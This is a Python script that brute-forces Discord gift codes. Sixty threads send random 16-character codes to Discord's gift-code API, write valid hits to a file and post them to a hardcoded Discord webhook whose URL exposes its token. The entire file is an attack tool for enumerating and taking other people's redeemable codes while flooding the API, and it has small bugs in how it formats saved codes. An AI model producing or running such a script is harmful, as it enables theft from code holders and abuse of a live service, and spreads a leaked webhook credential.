import requests
import threading
import string
import random
from console.utils import set_title
from colorama import *
from discord_webhook import DiscordWebhook

validsave = open("valid.txt", "w")

def bruteforcer():
    while True:
        code = ''.join(random.choices(string.ascii_letters + string.digits, k=16))
        r = requests.get(f"https://discordapp.com/api/v8/entitlements/gift-codes/{code}?with_application=false&with_subscription_plan=true")
        if r.status_code == 200:
            print(Fore.GREEN + f"[>] Valid : discord.gift/{code}")
            validsave.write(f"discord.gg/{code}")
            webhook = DiscordWebhook(url='https://discord.com/api/webhooks/801342303955451906/zFwE3pwFILi4C_AUDK42NrtgOjwVBrbq5xWTvoPxky6EHWY3eoiW2Iyi-L8zvY8Ott1o', content=f'discord.gift{code}')
            response = webhook.execute()
        else:
            print(Fore.RED + f"[>] Invalid : discord.gift/{code}")

t1 = threading.Thread(target=bruteforcer)
t2 = threading.Thread(target=bruteforcer)
t3 = threading.Thread(target=bruteforcer)
t4 = threading.Thread(target=bruteforcer)
t5 = threading.Thread(target=bruteforcer)
t6 = threading.Thread(target=bruteforcer)
t7 = threading.Thread(target=bruteforcer)
t8 = threading.Thread(target=bruteforcer)
t9 = threading.Thread(target=bruteforcer)
t10 = threading.Thread(target=bruteforcer)
t11 = threading.Thread(target=bruteforcer)
t12 = threading.Thread(target=bruteforcer)
t13 = threading.Thread(target=bruteforcer)
t14 = threading.Thread(target=bruteforcer)
t15 = threading.Thread(target=bruteforcer)
t16 = threading.Thread(target=bruteforcer)
t17 = threading.Thread(target=bruteforcer)
t18 = threading.Thread(target=bruteforcer)
t19 = threading.Thread(target=bruteforcer)
t20 = threading.Thread(target=bruteforcer)
t21 = threading.Thread(target=bruteforcer)
t22 = threading.Thread(target=bruteforcer)
t23 = threading.Thread(target=bruteforcer)
t24 = threading.Thread(target=bruteforcer)
t25 = threading.Thread(target=bruteforcer)
t26 = threading.Thread(target=bruteforcer)
t27 = threading.Thread(target=bruteforcer)
t28 = threading.Thread(target=bruteforcer)
t29 = threading.Thread(target=bruteforcer)
t30 = threading.Thread(target=bruteforcer)
t31 = threading.Thread(target=bruteforcer)
t32 = threading.Thread(target=bruteforcer)
t33 = threading.Thread(target=bruteforcer)
t34 = threading.Thread(target=bruteforcer)
t35 = threading.Thread(target=bruteforcer)
t36 = threading.Thread(target=bruteforcer)
t37 = threading.Thread(target=bruteforcer)
t38 = threading.Thread(target=bruteforcer)
t39 = threading.Thread(target=bruteforcer)
t40 = threading.Thread(target=bruteforcer)
t41 = threading.Thread(target=bruteforcer)
t42 = threading.Thread(target=bruteforcer)
t43 = threading.Thread(target=bruteforcer)
t44 = threading.Thread(target=bruteforcer)
t45 = threading.Thread(target=bruteforcer)
t46 = threading.Thread(target=bruteforcer)
t47 = threading.Thread(target=bruteforcer)
t48 = threading.Thread(target=bruteforcer)
t49 = threading.Thread(target=bruteforcer)
t50 = threading.Thread(target=bruteforcer)
t51 = threading.Thread(target=bruteforcer)
t52 = threading.Thread(target=bruteforcer)
t53 = threading.Thread(target=bruteforcer)
t54 = threading.Thread(target=bruteforcer)
t55 = threading.Thread(target=bruteforcer)
t56 = threading.Thread(target=bruteforcer)
t57 = threading.Thread(target=bruteforcer)
t58 = threading.Thread(target=bruteforcer)
t59 = threading.Thread(target=bruteforcer)
t60 = threading.Thread(target=bruteforcer)
t1.start()
t2.start()
t3.start()
t4.start()
t5.start()
t6.start()
t7.start()
t8.start()
t9.start()
t10.start()
t11.start()
t12.start()
t13.start()
t14.start()
t15.start()
t16.start()
t17.start()
t18.start()
t19.start()
t20.start()
t21.start()
t22.start()
t23.start()
t24.start()
t25.start()
t26.start()
t27.start()
t28.start()
t29.start()
t30.start()
t31.start()
t32.start()
t33.start()
t34.start()
t35.start()
t36.start()
t37.start()
t38.start()
t39.start()
t40.start()
t41.start()
t42.start()
t43.start()
t44.start()
t45.start()
t46.start()
t47.start()
t48.start()
t49.start()
t50.start()
t51.start()
t52.start()
t53.start()
t54.start()
t55.start()
t56.start()
t57.start()
t58.start()
t59.start()
t60.start()
                                        
